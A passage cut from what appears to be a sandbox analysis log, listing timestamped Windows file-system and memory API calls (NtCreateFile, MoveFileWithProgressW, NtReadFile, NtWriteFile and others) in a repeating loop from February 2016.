"NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,698", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,698", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,708", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,718", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:45,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,728", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,728", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,738", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,738", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:45,758", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,768", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,778", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,778", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:45,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,788", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,798", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,808", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,808", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,818", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,818", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,828", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,828", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:45,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,868", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,878", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:45,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,898", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,908", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:45,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,918", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,918", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,928", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,938", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:45,948", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,948", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,948", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,958", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,958", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,988", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,988", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,008", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,018", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,018", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,028", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,028", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,038", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,038", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,048", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,048", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,058", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,058", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,068", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,068", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,078", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:46,078", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,078", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,088", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,088", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,098", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,108", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:46,108", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,108", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,108", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,118", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,118", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,128", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,128", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 